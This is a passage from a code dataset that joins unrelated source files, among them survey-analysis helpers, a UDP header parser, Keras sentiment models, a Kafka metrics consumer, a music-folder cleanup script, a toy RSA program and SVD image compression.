return data\n\n def list_grouper(self, *args):\n r = pd.DataFrame([*args])\n r = r.transpose()\n return r\n\n def mcpaired(self, qcol1, qcol2):\n qid1 = self.survey['exportColumnMap'][qcol1]['question']\n qid2 = self.survey['exportColumnMap'][qcol2]['question']\n question1 = self.survey['questions'][qid1]\n question2 = self.survey['questions'][qid2]\n if not (question1['questionType']['type'] == \"MC\" and (question1['questionType']['selector'] == \"SAVR\" or question1['questionType']['selector'] == \"SAHR\")):\n sys.stderr.write(\"{0} is not a multiple choice, single-answer question\\n\".format(qcol1))\n return None\n if not (question2['questionType']['type'] == \"MC\" and (question2['questionType']['selector'] == \"SAVR\" or question2['questionType']['selector'] == \"SAHR\")):\n sys.stderr.write(\"{0} is not a multiple choice, single-answer question\\n\".format(qcol2))\n return None\n choices1 = question1['choices']\n choices2 = question2['choices']\n s1 = np.array([np.NaN]*self.N)\n s2 = np.array([np.NaN]*self.N)\n rids = []\n for i,j in zip(self.survey_data['responses'], range(self.N)):\n s1[j] = i[qcol1]\n s2[j] = i[qcol2]\n rids.append(i['ResponseID'])\n data = pd.DataFrame(index=rids)\n data[qcol1] = s1\n data[qcol2] = s2\n names1 = []\n keys1 = sorted(choices1.keys(), key=int)\n for i in keys1:\n names1 += [choices1[i]['choiceText']]\n names2 = []\n keys2 = sorted(choices2.keys(), key=int)\n for i in keys2:\n names2 += [choices2[i]['choiceText']]\n return {\"pairs\":data, \"keys1\":keys1,\"keys2\":keys2, \"names1\":names1,\"names2\":names2}\n\n def pairs2list(self, mcp):\n pairs = mcp['pairs']\n k1 = list(map(int, mcp['keys1']))\n k2 = list(map(int, mcp['keys2']))\n cname1 = pairs.columns[0]\n cname2 = pairs.columns[1]\n group = pairs.groupby(cname2)\n data = pd.DataFrame(index=k1)\n for i in range(len(k2)):\n k = k2[i]\n subset = group.get_group(k)[cname1]\n sums = pd.Series([0]*len(k1), index=k1)\n for i in range(len(k1)):\n ik = k1[i]\n bools = subset == ik\n sums[ik] = bools.sum()\n data[k] = sums\n data.index = mcp['names1']\n data.columns = mcp['names2']\n return data\n\n def mcmatrix(self, qcol):\n qcols = {}\n for i in self.survey['exportColumnMap'].keys():\n if i.startswith(qcol+\"_\"):\n if i.endswith(\"_TEXT\"):\n continue\n try:\n qcols[i] = self.survey['exportColumnMap'][i]['subQuestion'].split(\".\")\n except KeyError:\n raise RuntimeError(\"{0} is not a multiple choice matrix question\\n\".format(qcol))\n qn = sorted(qcols.keys(), key=lambda k: int(qcols[k][2]))\n qid = self.survey['exportColumnMap'][qn[0]]['question']\n question = self.survey['questions'][qid]\n if question['questionType']['type'] != \"Matrix\" and question['questionType']['subSelector'] != \"SingleAnswer\":\n raise RuntimeError(\"{0} is not a multiple choice matrix question\\n\".format(qcol))\n return None\n choices = question['choices']\n sub_questions = question['subQuestions']\n data = pd.DataFrame({})# index=range(len(choices)))\n for i in qn:\n row = self.mc2list(i)\n data[i] = row\n qnames = []\n qkeys = sorted(sub_questions.keys(), key=int)\n for i in qkeys:\n qnames += [sub_questions[i]['description']]\n data.columns = qnames\n data = data.transpose()\n return data\n\n def hasq_in_val(self, qcol, values):\n rids = []\n data = pd.Series(np.array([0]*self.N, dtype=np.bool))\n for i,j in zip(self.survey_data['responses'], range(self.N)):\n if i[qcol] in values:\n data[j] = True\n else:\n data[j] = False\n rids.append(i['ResponseID'])\n data.index = rids\n return data\n def hasqs_in_val(self, 
qcols, values):\n acc = False\n for i in qcols:\n hq = self.hasq_in_val(i, values)\n acc |= hq\n return acc","repo_name":"computergeek125/writ3562w_itmrp_survey","sub_path":"qualtrics_api/Qv3_helpers.py","file_name":"Qv3_helpers.py","file_ext":"py","file_size_in_byte":7675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15410015455","text":"from __future__ import print_function\nfrom __future__ import absolute_import\n\n# from ctypes import *\n\nimport ctypes\nimport socket\n\n# UDP provides a procedure for application programs to send\n# messages to other programs with a minimum of protocol mechanism. The\n# protocol is transaction oriented, and delivery and duplicate protection\n# are not guaranteed. Applications requiring ordered reliable delivery of\n# streams of data should use the Transmission Control Protocol\n\n# Format\n# ------\n\n\n# 0 7 8 15 16 23 24 31\n# +--------+--------+--------+--------+\n# | Source | Destination |\n# | Port | Port |\n# +--------+--------+--------+--------+\n# | | |\n# | Length | Checksum |\n# +--------+--------+--------+--------+\n# |\n# | data octets ...\n# +---------------- ...\n\n# User Datagram Header Format\n\n\n# Source Port is an optional field, when meaningful, it indicates the port\n# of the sending process, and may be assumed to be the port to which a\n# reply should be addressed in the absence of any other information. If\n# not used, a value of zero is inserted.\n\n# Destination Port has a meaning within the context of a particular\n# internet destination address.\n\n# Length is the length in octets of this user datagram including this\n# header and the data. (This means the minimum value of the length is\n# eight.)\n\nUDP_MIN_HDRLEN = 8\n\n# Checksum is the 16-bit one's complement of the one's complement sum of a\n# pseudo header of information from the IP header, the UDP header, and the\n# data, padded with zero octets at the end (if necessary) to make a\n# multiple of two octets.\n\n# The pseudo header conceptually prefixed to the UDP header contains the\n# source address, the destination address, the protocol, and the UDP\n# length. This information gives protection against misrouted datagrams.\n# This checksum procedure is the same as is used in TCP.\n\n# 0 7 8 15 16 23 24 31\n# +--------+--------+--------+--------+\n# | source address |\n# +--------+--------+--------+--------+\n# | destination address |\n# +--------+--------+--------+--------+\n# | zero |protocol| UDP length |\n# +--------+--------+--------+--------+\n\n# If the computed checksum is zero, it is transmitted as all ones (the\n# equivalent in one's complement arithmetic). 
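The one's-complement checksum these RFC excerpts describe (and which the `UDP.checksum` method below implements with a fold-and-carry lambda) can be sketched on its own. A minimal version, assuming an even-length byte string for brevity; real code pads odd-length data with a zero octet:

```python
import socket


def ones_complement_checksum(msg: bytes) -> int:
    # Sum 16-bit words (low byte first, matching the class below) with
    # end-around carry, fold any residual carry, then take the complement.
    s = 0
    for i in range(0, len(msg), 2):
        w = msg[i] + (msg[i + 1] << 8)
        s = ((s + w) & 0xffff) + ((s + w) >> 16)
    s = (s & 0xffff) + (s >> 16)
    return socket.htons(~s & 0xffff)


print(hex(ones_complement_checksum(b"\x00\x01\xf2\x03\xf4\xf5")))
```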
An all zero transmitted\n# checksum value means that the transmitter generated no checksum (for\n# debugging or for higher level protocols that don't care).\n\nclass UDP(ctypes.BigEndianStructure):\n\n    _align_ = 1\n\n    _fields_ = [\n        ('udp_sport', ctypes.c_uint16),     # /* 16 bit Source Port */\n        ('udp_dport', ctypes.c_uint16),     # /* 16 bit Destination Port */\n        ('udp_len', ctypes.c_uint16),       # /* 16 bit length = header + data */\n        ('udp_checksum', ctypes.c_uint16),  # /* 16 bit UDP Checksum */\n\n        # ('udp_data', bytes)               # /* Possible Lengths, UDP Data */\n    ]\n\n    def __init__(self, udp_sport=0, udp_dport=0, udp_len=UDP_MIN_HDRLEN, udp_checksum=0, udp_data=b''):\n        super(UDP, self).__init__(udp_sport, udp_dport, udp_len, udp_checksum)\n\n        self.udp_data = udp_data\n\n    def pack(self):\n        '''pack a UDP object into binary data.'''\n        bindata = ctypes.string_at(ctypes.addressof(self), ctypes.sizeof(self))\n        bindata += self.udp_data\n\n        return bindata\n\n    def unpack(self, buf):\n        '''unpack binary buf into a UDP object.'''\n\n        if not isinstance(buf, bytes):\n            raise Exception('unpack buffer must be a byte string.')\n\n        cstring = ctypes.create_string_buffer(buf)\n        ctype_instance = ctypes.cast(ctypes.pointer(cstring), ctypes.POINTER(UDP)).contents\n\n        ctype_instance.udp_data = buf[UDP_MIN_HDRLEN:len(buf)]  # /* UDP Data */\n\n        return ctype_instance\n\n    def wireshark_print(self):\n        '''print the packet fields the way Wireshark displays them.'''\n        print(\"User Datagram Protocol, Src Port: %d, Dst Port: %d\" % (self.udp_sport, self.udp_dport))\n        print(\"Source Port: %d\" % self.udp_sport)\n        print(\"Destination Port: %d\" % self.udp_dport)\n        print(\"Length: %d\" % self.udp_len)\n        print(\"Checksum: 0x%04x\" % self.checksum())\n\n    def checksum(self, msg=None):\n        '''compute the 16-bit one's complement checksum.'''\n\n        # https://github.com/emamirazavi/python3-ping/blob/master/ping.py#L246\n        # https://stackoverflow.com/questions/3949726/calculate-ip-checksum-in-python\n\n        self.udp_checksum = 0  # Initialize udp_checksum to zero (First)\n        msg = msg if msg else self.raw  # calculate (Second)\n\n        f = lambda a, b: ((a + b) & 0xffff) + ((a + b) >> 16)\n        n = len(msg)\n        cnt = (n // 2) * 2\n        s = 0\n\n        for i in range(0, cnt, 2):\n            x = msg[i]\n            y = msg[i+1]\n\n            try:\n                w = x + (y << 8)  # Python 3: indexing bytes yields ints\n            except TypeError:\n                w = ord(x) + (ord(y) << 8)  # Python 2: indexing str yields 1-char strings\n\n            s = f(s, w)\n\n        s &= 0xffffffff\n\n        s += (s >> 16)\n        s = ~s & 0xffff\n\n        s = socket.htons(s)\n        self.udp_checksum = s\n        return s\n\n    @property\n    def raw(self):\n        '''udp raw data'''\n        return self.pack()\n\n    def __str__(self):\n        '''return packet binary as a string.'''\n        return str(self.pack())\n\n    def __len__(self):\n        '''return packet length.'''\n        return ctypes.sizeof(self)\n\n\nif __name__ == '__main__':\n    bindata = b'\\x14\\xe9\\x14\\xe9\\x00\\x30\\x9b\\xfd\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x5f\\x67\\x6f\\x6f\\x67\\x6c\\x65\\x63\\x61\\x73\\x74\\x04\\x5f\\x74\\x63\\x70\\x05\\x6c\\x6f\\x63\\x61\\x6c\\x00\\x00\\x0c\\x80\\x01'\n\n    udp = UDP()\n    udp.pack()\n    udp.wireshark_print()\n\n    newudp = udp.unpack(bindata)\n    newudp.wireshark_print()\n\n\n## References\n\n# https://tools.ietf.org/html/rfc768","repo_name":"nixawk/hello-python2","sub_path":"ctypes/protocols/udp.py","file_name":"udp.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"34"}
{"seq_id":"31634629310","text":"# Basic Packages\nimport pandas as pd\nimport numpy as np\nimport re\nimport nltk\n\n# Modeling\nfrom keras.models import 
Sequential\nfrom keras.layers.core import Activation, Dropout, Dense\nfrom keras.layers import Flatten, LSTM, Bidirectional, Layer\nfrom keras.layers import Embedding\nfrom keras.activations import softmax\nfrom keras import backend as K\n\n# Visualization\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set()\n\n## Function adopted from \n#Preprovessing function to remove tags, html, special characters,and etc\nclass pre_pro:\n def __init__(self):\n self.TAG_RE = re.compile(r'<[^>]+>')\n def preprocess_text(self,inputSentence):\n # Removing html tags\n sentence = self.TAG_RE.sub('', inputSentence)\n\n # Remove punctuations and numbers\n sentence = re.sub('[^a-zA-Z]', ' ', sentence)\n\n # Single character removal\n sentence = re.sub(r\"\\s+[a-zA-Z]\\s+\", ' ', sentence)\n\n # Removing multiple spaces\n sentence = re.sub(r'\\s+', ' ', sentence)\n\n return sentence\n\nclass self_model:\n def __init__(self,vs,em,maxlen = 100,d=100):\n self.maxlen = maxlen\n self.seqModel = Sequential()\n self.embedding_layer = Embedding(vs, d, weights=[em], input_length=maxlen , trainable=False)\n self.seqModel.add(self.embedding_layer)\n \n def simpleNN(self):\n self.seqModel.add(Flatten())\n self.seqModel.add(Dense(1, activation='sigmoid'))\n self.seqModel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])\n print(self.seqModel.summary())\n return(self.seqModel)\n \n def LSTM(self, soft = False, results = 1):\n self.seqModel.add(LSTM(128))\n if soft:\n self.seqModel.add(Dense(results, activation='softmax'))\n self.seqModel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc'])\n else:\n self.seqModel.add(Dense(1, activation='sigmoid'))\n self.seqModel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])\n print(self.seqModel.summary())\n return(self.seqModel)\n \n def bi_LSTM(self, Att = False,soft = False, results = 1):\n if Att:\n self.seqModel.add(Bidirectional(LSTM(128,return_sequences=True)))\n self.seqModel.add(Attention(return_sequences=True))\n self.seqModel.add(LSTM(128))\n else:\n self.seqModel.add(Bidirectional(LSTM(128)))\n if soft:\n self.seqModel.add(Dense(results, activation='softmax'))\n self.seqModel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc'])\n else:\n self.seqModel.add(Dense(1, activation='sigmoid'))\n self.seqModel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])\n print(self.seqModel.summary())\n return(self.seqModel)\n \n def show_performance_plot(history):\n fig, (ax1,ax2) = plt.subplots(1,2,figsize=(10, 5))\n #show the model accuracy\n ax1.plot(history.history['acc'],label='train')\n ax1.plot(history.history['val_acc'],label='test')\n\n ax1.set(title='model accuracy',xlabel='epoch',ylabel='accuracy')\n ax1.legend(loc='upper left')\n #show model loss\n ax2.plot(history.history['loss'],label='train')\n ax2.plot(history.history['val_loss'],label='test')\n\n ax2.set(title='model loss',xlabel='epoch',ylabel='loss')\n ax2.legend(loc='upper right')\n fig.tight_layout()\n return(fig)\n\n \n# The Following Class for attention layer is adopted from \n# https://stackoverflow.com/questions/62948332/how-to-add-attention-layer-to-a-bi-lstm\n \nclass Attention(Layer):\n def __init__(self, return_sequences=True):\n self.return_sequences = return_sequences\n super(Attention,self).__init__()\n \n def build(self, input_shape):\n\n self.W=self.add_weight(name=\"att_weight\", shape=(input_shape[-1],1),\n initializer=\"normal\")\n self.b=self.add_weight(name=\"att_bias\", 
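# --- Editor's note (added by the editor, not part of the original file) ---
# The Attention layer being built here is a simplified additive (Bahdanau-style)
# attention over the LSTM's time axis: in call(), scores e = tanh(x.W + b) are
# softmax-normalised along axis 1 (time) into weights a, and the layer returns
# either the reweighted sequence x * a (return_sequences=True) or its sum over
# time, i.e. a single context vector per example.
# --- end editor's note ---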
shape=(input_shape[1],1),\n initializer=\"zeros\")\n\n super(Attention,self).build(input_shape)\n\n def call(self, x):\n\n e = K.tanh(K.dot(x,self.W)+self.b)\n a = K.softmax(e, axis=1)\n output = x*a\n\n if self.return_sequences:\n return output\n\n return K.sum(output, axis=1)\nclass performance_evplot:\n def __init__(self,h):\n fig, (ax1,ax2) = plt.subplots(1,2,figsize=(10, 5))\n #show the model accuracy\n ax1.plot(h.history['acc'],label='train')\n ax1.plot(h.history['val_acc'],label='test')\n\n ax1.set(title='model accuracy',xlabel='epoch',ylabel='accuracy')\n ax1.legend(loc='upper left')\n #show model loss\n ax2.plot(h.history['loss'],label='train')\n ax2.plot(h.history['val_loss'],label='test')\n\n ax2.set(title='model loss',xlabel='epoch',ylabel='loss')\n ax2.legend(loc='upper right')\n fig.tight_layout()","repo_name":"siuol456/NLPResearch","sub_path":"SentimentModel/Functions/Modeling_functions.py","file_name":"Modeling_functions.py","file_ext":"py","file_size_in_byte":5063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25560361835","text":"#! /Users/xiaotongli/anaconda3/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 10/12/18 10:52 PM\n# @Author : Xiaotong Li\n# @School : University of California, Santa Cruz\n# @FileName: deleteNode.py\n# @Software: PyCharm\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def deleteNode(self, root, key):\n \"\"\"\n :type root: TreeNode\n :type key: int\n :rtype: TreeNode\n \"\"\"\n # first search the key and determine how many child the node has,\n if not root:\n return root\n if root.val > key:\n root.left = self.deleteNode(root.left, key)\n elif root.val < key:\n root.right = self.deleteNode(root.right, key)\n else:\n if not root.right:\n return root.left\n if not root.left:\n return root.right\n temp = root.right\n mini = temp.val\n while temp.left:\n temp = temp.left\n mini = temp.val\n root.val = mini\n root.right = self.deleteNode(root.right, root.val)\n return root\n","repo_name":"jxlxt/leetcode","sub_path":"Python/BinarySearchTree/deleteNode.py","file_name":"deleteNode.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3447450867","text":"SAVE = \"Uložit\"\nKMB_CENA = 2200 # KMB_CENA duplicitně v portal.py ; také v portal/kmb.py aktualizuj výši slevy [%]\n\n\n@auth.requires_login()\ndef add():\n form = SQLFORM(db.kmb, submit_text=SAVE)\n if form.process().accepted:\n redirect(URL('portal', 'main'))\n response.view = 'kmb/edit.html'\n response.files.append(URL('static', 'js/bootbox.min.js'))\n return dict(form=form, kmb_id=None, KMB_CENA=KMB_CENA)\n\n\n@auth.requires_login()\ndef edit():\n next = URL('portal', 'main')\n try:\n kmb_id = int(request.args(0))\n except (TypeError, ValueError):\n kmb_id = None\n if kmb_id is None:\n redirect(next)\n kmb = db(db.kmb.id == kmb_id).select(db.kmb.auth_user_id).first()\n if not kmb or kmb.auth_user_id != auth.user_id:\n redirect(next)\n\n form = SQLFORM(db.kmb, kmb_id, submit_text=SAVE, showid=False)\n if form.process().accepted:\n redirect(next)\n response.files.append(URL('static', 'js/bootbox.min.js'))\n return dict(form=form, kmb_id=kmb_id, KMB_CENA=KMB_CENA)\n\n\n@auth.requires_login()\ndef delete():\n next = URL('portal', 'main')\n try:\n kmb_id = int(request.args(0))\n except (TypeError, ValueError):\n 
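# --- Editor's worked example (added by the editor, not part of the original file) ---
# The deleteNode solution above covers three cases: a node with at most one child
# is replaced by that (possibly empty) child, while a node with two children takes
# the value of its in-order successor -- the leftmost node of its right subtree --
# and the successor is then deleted recursively. For instance, deleting 5:
#
#         5                  6
#        / \    becomes     / \
#       3   8              3   8
#          / \                  \
#         6   9                  9
#
# The successor of 5 is 6, so the root's value becomes 6 and the duplicate 6 is
# removed from the right subtree; the result is still a valid BST.
# --- end editor's example ---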
kmb_id = None\n if kmb_id is None:\n redirect(next)\n\n db((db.kmb.id == kmb_id) & (db.kmb.auth_user_id == auth.user_id)).delete()\n redirect(next)\n","repo_name":"zvolsky/zv","sub_path":"controllers/kmb.py","file_name":"kmb.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15613764124","text":"import os\nimport json\nfrom kafka import KafkaConsumer\n\nKAFKA_BROKER_URL = os.environ.get('KAFKA_BROKER_URL')\nMETRIC_TOPIC = os.environ.get(\"METRIC_TOPIC\")\n\nprocess_time_sum = 0\nrecords_processed = 0\n\n\ndef aggregate_stats():\n \"\"\"\n Aggregates list of metrics into sums and averages\n to give overall performance of microservice.\n Returns dict of form:\n {\n \"Records_Processed\": int,\n \"Avg_Records_Per_Second\": float\n }\n\n :return: dict of form above\n \"\"\"\n # If data is empty, don't do anything:\n if process_time_sum == 0:\n return {}\n\n return {\n \"Records_Processed\": records_processed,\n \"Avg_Records_Per_Second\":\n records_processed / process_time_sum,\n }\n\n\nif __name__ == '__main__':\n consumer = KafkaConsumer(\n METRIC_TOPIC,\n bootstrap_servers=KAFKA_BROKER_URL,\n value_deserializer=lambda value: json.loads(value),\n consumer_timeout_ms=15000\n )\n\n # Consumer metrics from kafka topic\n # and add to metric_agg dict of lists\n for message in consumer:\n process_time_sum += message.value[\"process_time\"]\n records_processed += message.value[\"records_processed\"]\n\n # When we're done, aggregate results\n # And print off metrics\n result = aggregate_stats()\n print(\"INGESTION METRICS\")\n for key, val in result.items():\n print(key, \":\", val)\n print()\n","repo_name":"schwertJake/Kafka_DDOS_Detection","sub_path":"ingest_metrics/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35048960230","text":"import os\r\nimport mutagen\r\n\r\ndef length_music_file(address):\r\n if address[-3:] == \"mp3\" or address[-3:] == \"m4a\":\r\n return int(mutagen.File(address).info.length) # legth\r\n else:\r\n return 0\r\n\r\n\r\ndef change_address(address, root, name):\r\n name_change = name[:-4]\r\n pos = 0\r\n for i, x in enumerate(name_change):\r\n if x.isalpha():\r\n pos = i\r\n break\r\n new_name = root + \"\\\\\" + name[pos:].capitalize()\r\n try:\r\n os.rename(address, new_name)\r\n except FileExistsError:\r\n os.remove(address)\r\n\r\n\r\ndirectory_list = list()\r\nfor root, dirs, files in os.walk(\"D:/Test\", topdown=False):\r\n for name in files:\r\n now_file = os.path.join(root, name)\r\n now_file_length = length_music_file(now_file)\r\n if now_file_length <= 60 or now_file_length >= 360:\r\n os.remove(now_file)\r\n else:\r\n change_address(now_file, root, name)\r\n\r\n","repo_name":"Oskorbin99/Learn_Python","sub_path":"Scripts/Work_with_new_music.py","file_name":"Work_with_new_music.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72913118179","text":"\"\"\"\nake the following IPv4 address: 128.32.10.1\n\nThis address has 4 octets where each octet is a single byte (or 8 bits).\n\n1st octet 128 has the binary representation: 10000000\n2nd octet 32 has the binary representation: 00100000\n3rd octet 10 has the binary representation: 00001010\n4th octet 1 has the binary representation: 00000001\nSo 128.32.10.1 == 
10000000.00100000.00001010.00000001\n\nBecause the above IP address has 32 bits, we can represent it as the unsigned 32 bit number: 2149583361\n\nComplete the function that takes an unsigned 32 bit number and returns a string representation of its IPv4 address.\n\nExamples\n2149583361 ==> \"128.32.10.1\"\n32 ==> \"0.0.0.32\"\n0 ==> \"0.0.0.0\"\n\nThe function below extracts each octet with bit shifts.\n\"\"\"\ndef int32_to_ip(int32):\n    # Work from the most significant octet down: shift, then mask off one byte.\n    if int32 is None:\n        return \"\"\n    return \".\".join(str((int32 >> shift) & 0xFF) for shift in (24, 16, 8, 0))\n\n\n\nprint(int32_to_ip(256))\n","repo_name":"YabseraBogale/python-Scripts","sub_path":"Ip4.py","file_name":"Ip4.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"2581693325","text":"# -*- coding: utf-8 -*-\n\nfrom setuptools import find_packages, setup\n\nversion='0.4'\n\nsetup(name='icalview',\n      version=version,\n      description=\"Provide icalendar export for Queries\",\n      author='Xavier Péchoultres',\n      author_email='x.pechoulres@clariprint.com',\n      url='http://trac-hacks.org/wiki/IcalViewPlugin',\n      keywords='trac plugin icalendar',\n      license=\"GPL\",\n      packages=find_packages(exclude=['ez_setup', 'examples', 'tests*']),\n      include_package_data=True,\n      zip_safe=False,\n      install_requires=[],\n      entry_points = \"\"\"\n    [trac.plugins]\n    icalview = icalview\n    \"\"\",\n      )\n\n","repo_name":"woochica/trachacks","sub_path":"icalviewplugin/0.11/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"25650361295","text":"# RSA Algorithm\n# By Sazzad Saju\n# CSE, HSTU\n#\n# Description: KeyGenerator program creates public_key (n,e) and\n# private_key (p,q). This RSA program will work for small primes\n# to big primes and generate encrypted string in HEX. 
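# --- Editor's note (added by the editor, not part of the original RSA file) ---
# The PowMod/mod_ex pair defined in the record below is a square-and-multiply
# modular exponentiation: mod_ex(b, k, m) computes b**(2**k) % m, and PowMod
# multiplies one such factor per set bit of the exponent. Python's builtin
# three-argument pow() computes the same thing and makes a handy cross-check
# (the concrete numbers are arbitrary editor-chosen test values):
#
#     assert PowMod(7, 65537, 3233 * 17) == pow(7, 65537, 3233 * 17)
# --- end editor's note ---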
Symmetric-\n# key should be encrypted using RSA before transmiting on online.\nimport pyperclip\n\ndef ConvertToInt(message):\n grd = 1\n num = 0\n message = message[::-1]\n for i in range(0, len(message), +1):\n num = num + ord(message[i]) * grd\n grd *= 256\n return num\n\ndef mod_ex(b, k, m):\n i = 1\n j = 0\n while (j <= k):\n b = (b * i) % m\n i = b\n j += 1\n return b\n\ndef PowMod(b, e, m):\n bin_e = bin(e)\n bin_e = bin_e[::-1]\n ln = len(bin_e)\n result = 1\n for i in range(0, ln - 2, +1):\n if (bin_e[i] == '1'):\n result *= mod_ex(b, i, m)\n return result % m\n\ndef Encrypt(message, modulo, e):\n cytxt = \"\"\n temp = modulo // 256\n per_char = 0\n while (temp != 0):\n temp = temp // 256\n per_char += 1\n cyln = pow(256, per_char)\n cyln = len(str(cyln)) + 1\n s = message\n for i in range(0, len(message), +per_char):\n s1 = s[:per_char]\n b = ConvertToInt(s1)\n cytxt1 = str(PowMod(b, e, modulo))\n if (len(cytxt1) < cyln):\n while ((cyln - len(cytxt1) > 0)):\n cytxt1 = \"0\" + cytxt1\n cytxt += cytxt1\n else:\n cytxt += cytxt1\n s = s[per_char:]\n to_i = int(cytxt)\n to_h = '%X' % to_i\n hex_cytxt = str(to_h)\n return hex_cytxt\n\ndef eea(a, b):\n if (a % b == 0):\n return (b, 0, 1)\n else:\n gcd, s, t = eea(b, a % b)\n s = s - ((a // b) * t)\n return (gcd, t, s)\n\ndef InvertModulo(e, phi):\n gcd, s, _ = eea(e, phi)\n if (gcd != 1):\n return None\n else:\n return s % phi\n\ndef ConvertToStr(num):\n st = \"\"\n while (num != 0):\n temp = num % 256\n st += chr(temp)\n chr(temp)\n num = num - temp\n num = num // 256\n st = st[::-1]\n return st\n\ndef Decrypt(ciphertext,modulo, e):\n with open('private_key', 'r') as f:\n p = f.readline()\n p = int(p[:-1])\n q = int(f.readline())\n to_i = int(ciphertext, 16)\n ciphertext = str(to_i)\n phi = (p - 1) * (q - 1)\n d = InvertModulo(e, phi)\n temp = modulo // 256\n per_char = 0\n while (temp != 0):\n temp = temp // 256\n per_char += 1\n cyln = pow(256, per_char)\n cyln = len(str(cyln)) + 1\n while (len(ciphertext) % cyln != 0):\n ciphertext = \"0\" + ciphertext\n s = ciphertext\n m = \"\"\n for i in range(0, len(ciphertext), +cyln):\n s1 = s[:cyln]\n b = int(s1)\n m += ConvertToStr(PowMod(b, d, modulo))\n s = s[cyln:]\n return m\n\n\nwith open('public_key','r') as f:\n modulo = f.readline()\n modulo = int(modulo[:-1])\n e = int(f.readline())\nprint(\"1) Encryption\\n2) Decryption\\n\")\nindicator = input(\"Enter Your Choice: \")\nif(indicator==\"1\"):\n Message = input(\"Enter Message: \")\n ciphertext = Encrypt(Message, modulo, e)\n print(\"Ciphertext: {}\".format(ciphertext))\n pyperclip.copy(ciphertext)\n spam = pyperclip.paste()\n print(\"Ciphertext is copped to clipboard!\")\nelif(indicator == \"2\"):\n ciphertext = input(\"Enter Ciphertext: \")\n message = Decrypt(ciphertext, modulo, e)\n print(\"Message: {}\".format(message))","repo_name":"Sazzad-Saju/RSA_Algorithm","sub_path":"RSA Algorithm.py","file_name":"RSA Algorithm.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"20226032740","text":"#Improve comments later...\r\n\r\nfrom matplotlib import pyplot\r\nimport re\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\ndef read_pgm(filename, byteorder='>'):\r\n \"\"\"Return image data from a raw PGM file as numpy array.\r\n\r\n Format specification: http://netpbm.sourceforge.net/doc/pgm.html\r\n\r\n \"\"\"\r\n with open(filename, 'rb') as f:\r\n buffer = f.read()\r\n try:\r\n header, width, height, maxval = re.search(\r\n 
b\"(^P5\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\r\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n]\\s)*)\", buffer).groups()\r\n except AttributeError:\r\n raise ValueError(\"Not a raw PGM file: '%s'\" % filename)\r\n return np.frombuffer(buffer,\r\n dtype='u1' if int(maxval) < 256 else byteorder + 'u2',\r\n count=int(width) * int(height),\r\n offset=len(header)\r\n ).reshape((int(height), int(width)))\r\n\r\n\r\ndef display_pgm(array): # Shows unaltered photo\r\n print(\"1.\\n\")\r\n pyplot.imshow(array, pyplot.cm.gray)\r\n pyplot.title(\"A\")\r\n pyplot.axis('off')\r\n pyplot.show()\r\n\r\n\r\ndef svd(image): # Performing SVD to find UDV^T\r\n u, s, vt = np.linalg.svd(image)\r\n return u, s, vt\r\n\r\n\r\ndef u(u_matrix): # Scaled for better looking picture (U)\r\n u_max = np.amax(u_matrix)\r\n u_min = np.amin(u_matrix)\r\n u_scaled = 255 * ((u_matrix - u_min) / (u_max - u_min))\r\n pyplot.imshow(u_scaled, pyplot.cm.gray)\r\n pyplot.title(\"U\")\r\n pyplot.axis('off')\r\n pyplot.show()\r\n return u_matrix\r\n\r\n\r\ndef s(s_matrix): # Scaled for better looking picture (D)\r\n s_max = np.amax(s_matrix)\r\n s_min = np.amin(s_matrix)\r\n s_scaled = 255 * ((s_matrix - s_min) / (s_max - s_min))\r\n pyplot.imshow(np.diag(s_scaled[:1]), pyplot.cm.gray)\r\n pyplot.title(\"D\")\r\n pyplot.axis('off')\r\n pyplot.show()\r\n return s_matrix\r\n\r\n\r\ndef vt(vt_matrix): # Scaled for better looking picture (V)\r\n vt_max = np.amax(vt_matrix)\r\n vt_min = np.amin(vt_matrix)\r\n vt_scaled = 255 * ((vt_matrix - vt_min) / (vt_max - vt_min))\r\n pyplot.imshow(vt_scaled, pyplot.cm.gray)\r\n pyplot.title(\"V^T\")\r\n pyplot.axis('off')\r\n pyplot.show()\r\n return vt_matrix\r\n\r\n\r\ndef recon(u_matrix, s_matrix, vt_matrix,\r\n img): # Reconstructing the image in parts to show the effect of gradually less compression\r\n print(\"2.\\n\")\r\n for i in range(1, 6):\r\n reconstruct = np.matrix(u_matrix[:, :i]) * np.diag(s_matrix[:i]) * 